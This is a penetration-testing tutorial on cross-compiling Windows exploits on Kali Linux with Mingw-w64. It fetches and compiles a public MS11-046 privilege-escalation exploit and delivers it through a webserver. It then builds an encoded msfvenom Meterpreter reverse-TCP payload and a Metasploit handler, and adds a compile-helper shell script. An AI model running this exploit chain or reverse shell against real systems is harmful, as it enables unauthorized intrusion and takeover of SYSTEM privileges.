How to compile Windows exploits on Kali Linux 3 (Mingw-w64)
Microsoft Windows still holds the largest market share when it comes to operating systems for desktop computers, both for enterprise use and personal use. Therefore it is highly likely you will encounter a lot of Windows workstations and servers during your penetration testing training and career. On the other hand, most penetration testers mainly use Linux based distributions such as Kali Linux, Pentoo or Backbox. Therefore you need the ability to quickly compile Windows exploits on your Linux machine. The solution for this is Mingw-w64.
Mingw-w64 is a free and open source software development environment for creating Windows applications. Mingw-w64 was originally called Mingw32, which did not support the 64-bit architecture. In this tutorial we will look at how to use Mingw-w64 to compile exploits for Windows on Kali Linux. Let's start with installing Mingw-w64 on Kali Linux.

Installing Mingw-w64 on Kali Linux

Mingw-w64 is not installed by default on Kali Linux 2016.2 and earlier versions, so we need to install it before we can compile Windows exploits on Linux. Run the following commands to install Mingw-w64:

apt-get update
apt-get install mingw-w64

Type y for yes to confirm and continue the Mingw-w64 installation process. Downloading and installing Mingw-w64 may take a little while to complete.

Use apt-get install mingw-w64 to install Mingw-w64 on your Kali host.

Unable to locate package mingw-w64

Sometimes you get an "Unable to locate package mingw-w64" error when trying to install the mingw-w64 package, and the output looks like this:

root@kali:~# apt-get install mingw-w64
Reading package lists… Done
Building dependency tree
Reading state information… Done
E: Unable to locate package mingw-w64

To solve this issue make sure you have the right repositories in the sources.list file. You can edit the file using nano:

nano /etc/apt/sources.list

Make sure you have the correct repositories in this file. You can find the repositories for different versions of Kali Linux on the following page:

http://docs.kali.org/general-use/kali-linux-sources-list-repositories

With the right repositories in the sources.list file, run apt-get update and then run the installation command for the Mingw-w64 package again.

Cross compiling Windows exploits with Mingw-w64

Now that we have Mingw-w64 installed we can start compiling Windows exploits on Kali Linux. For this tutorial we will compile a Windows exploit written in C for CVE-2011-1249 (MS11-046), a vulnerability in Windows 7 SP0 x86. This version of the Windows operating system contains a vulnerability in the Ancillary Function Driver (AFD) which allows an elevation of privilege for an authenticated non-administrative user. Even though Mingw-w64 was developed for the much needed 64-bit support, we can also compile 32-bit Windows exploits. Let's have a look at how we can compile 32-bit Windows exploits.

Let's start with downloading the exploit from Exploit-db:

wget --output-document=40564.c https://www.exploit-db.com/download/40564

Use the following command to compile the afd.sys exploit for Windows 32 bit:

i686-w64-mingw32-gcc [input file: source] -o [output file: .exe] -lws2_32

The following command will compile the Windows 7 afd.sys privilege escalation exploit:

i686-w64-mingw32-gcc 40564.c -o exploit.exe -lws2_32

Compile the Windows exploit.

To transfer the exploit to the target host we will serve it with the built-in Apache webserver. The last two commands copy the exploit to the Apache home directory and start the Apache webserver.

When we download and execute the exploit from cmd.exe it will look like this:

The exploit executed successfully.

As we can see, the whoami command returns the privileged user before executing the exploit and the system user after. This exploit spawns a new shell in the current shell it was launched from instead of a new shell in a new window. This means we can also run this exploit from a command line shell such as Meterpreter. Let's see how we can run the exploit from a Meterpreter session.

Exploit compilation errors

When compiling exploits for different architectures and operating systems many errors can occur. There are a lot of variables that can cause the compilation to fail, such as syntax, libraries, host and target architectures, the software installed for compiling the code and a lot more. Some errors are easy to fix and some are not. It is also important to distinguish warnings from fatal errors: warnings may just indicate something like a deprecated function, which does not prevent the exploit from working, while fatal errors do prevent the exploit from working and therefore need to be fixed.

The best way to deal with compilation errors is to read them carefully and then search Google for solutions. Often you are not the first and only person facing a certain compilation error, so there is no need to reinvent the wheel. Online resources such as Stack Exchange often provide possible solutions for the most common compilation errors.

Exploit MS11-046 from a Meterpreter shell

Let's quickly generate a Windows 32-bit Meterpreter reverse TCP payload using Msfvenom and execute it on the target host. We will use the multi handler in Metasploit to catch the reverse shell. Use the following command to create the payload using Msfvenom:

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=[IP attackbox] LPORT=4444 -e x86/shikata_ga_nai -f exe -o exploit.exe

Be sure to replace the listening host IP and, if necessary, the listening port. Now start msfconsole and run the following commands to set up the multi handler exploit:

use exploit/multi/handler
set lhost [listening host IP]
set lport 4444
run

Start the reverse TCP handler on port 4444.

Then download the exploit to the target host and execute it. If everything was set up correctly you should receive a reverse Meterpreter shell on the msfconsole:

The target host connects back to the Kali box.

Next type shell on the Meterpreter command line and run the privilege escalation exploit to escalate the shell to a system shell:

The privilege escalation exploit executed successfully through our Meterpreter session.

As you can see the shell goes from the privileged test user shell to a system shell. Please note that the new system shell is spawned in the shell it was executed from, so we cannot see the exploit output as it is in the old shell with limited privileges.

You can verify this by typing exit, which will exit the system shell and return you to the user shell, which still contains the Windows 7 privilege escalation exploit output:

The exploit output on the privileged user shell.
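As an added example for the cross-compilation and compilation-error sections above (this is not code from the original article or from the Mingw-w64 project), the following POSIX shell script wraps the i686-w64-mingw32-gcc invocation shown earlier: it picks the compiler driver by target architecture, counts gcc warnings separately from fatal errors and unresolved ld references so that a build that only produced warnings is not mistaken for a failed one, and checks that the produced file really is a PE executable (an MZ header plus the PE signature at e_lfanew). The script name build_win_exploit.sh, the function names, the sample gcc diagnostics and the fake PE header fixture are assumptions constructed for this example.

```shell
#!/bin/sh
# build_win_exploit.sh - added example, not from the original article.
# Wraps the Mingw-w64 cross compiler: choose the driver by architecture,
# separate warnings from fatal errors, and verify the result is a PE file.
# File names, sample diagnostics and the PE fixture below are constructed.

# Map a target architecture to the Mingw-w64 gcc driver name (returns 1 if unknown).
mingw_compiler_for() {
    case "$1" in
        x86|i686|32)    echo "i686-w64-mingw32-gcc" ;;
        x64|x86_64|64)  echo "x86_64-w64-mingw32-gcc" ;;
        *)              return 1 ;;
    esac
}

# Read gcc/ld output on stdin and print "<warnings> <errors>".
# gcc tags diagnostics with "file:line:col: warning:" / "error:" / "fatal error:";
# ld reports missing symbols as "undefined reference to", which is also fatal.
classify_diagnostics() {
    warnings=0
    errors=0
    while IFS= read -r line; do
        case "$line" in
            *": warning: "*)
                warnings=$((warnings + 1)) ;;
            *": error: "*|*": fatal error: "*|*"undefined reference to"*)
                errors=$((errors + 1)) ;;
        esac
    done
    echo "$warnings $errors"
}

# Constructed sample compiler output (1 warning, 3 fatal problems) for trying
# classify_diagnostics without a compiler installed.
sample_diagnostics() {
    cat <<'EOF'
40564.c: In function 'main':
40564.c:120:9: warning: unused variable 'ret' [-Wunused-variable]
40564.c:3:10: fatal error: windows.h: No such file or directory
40564.c:57:5: error: 'SOCKET' undeclared (first use in this function)
/usr/bin/ld: /tmp/ccX.o: undefined reference to `WSAStartup@8'
EOF
}

# True if the file starts with the DOS "MZ" magic and carries "PE\0\0" at the
# offset stored in e_lfanew (bytes 60..63, little endian, decoded byte by byte).
is_pe_file() {
    f="$1"
    [ -f "$f" ] || return 1
    magic=$(dd if="$f" bs=1 count=2 2>/dev/null)
    [ "$magic" = "MZ" ] || return 1
    set -- $(od -A n -t u1 -j 60 -N 4 "$f")
    [ $# -eq 4 ] || return 1
    lfanew=$(( $1 + $2 * 256 + $3 * 65536 + $4 * 16777216 ))
    sig=$(dd if="$f" bs=1 skip="$lfanew" count=4 2>/dev/null | od -A n -t x1 | tr -d ' \n')
    [ "$sig" = "50450000" ]
}

# Constructed fixture: a 64-byte DOS header with e_lfanew = 64 followed by "PE\0\0".
write_fake_pe_header() {
    out="$1"
    printf 'MZ' > "$out"
    dd if=/dev/zero bs=1 count=58 >> "$out" 2>/dev/null
    printf '\100\000\000\000PE\000\000' >> "$out"
}

# Cross compile SRC for ARCH into OUT, linking ws2_32 as the article does.
# Fails if the compiler is missing, reported fatal errors, or produced a non-PE file.
build_exploit() {
    arch="$1"; src="$2"; out="$3"
    cc=$(mingw_compiler_for "$arch") || { echo "unknown arch: $arch" >&2; return 2; }
    command -v "$cc" >/dev/null 2>&1 || { echo "$cc not found (apt-get install mingw-w64)" >&2; return 2; }
    log=$(mktemp)
    "$cc" "$src" -o "$out" -lws2_32 2>"$log"
    status=$?
    cat "$log" >&2
    counts=$(classify_diagnostics <"$log")
    rm -f "$log"
    echo "warnings/errors: $counts"
    [ "$status" -eq 0 ] || return 1
    is_pe_file "$out" || { echo "$out is not a PE executable" >&2; return 1; }
    echo "built $out with $cc"
}

# Usage: ./build_win_exploit.sh x86 40564.c exploit.exe
if [ "$#" -eq 3 ]; then
    build_exploit "$1" "$2" "$3"
fi
```

Warnings alone mean the binary was still produced; any line tagged error or fatal error, or an unresolved symbol from ld, means it was not, which is the distinction the compilation-error section draws. The PE check catches the common slip of invoking the host gcc instead of the Mingw-w64 driver, which yields an ELF file that Windows will not run.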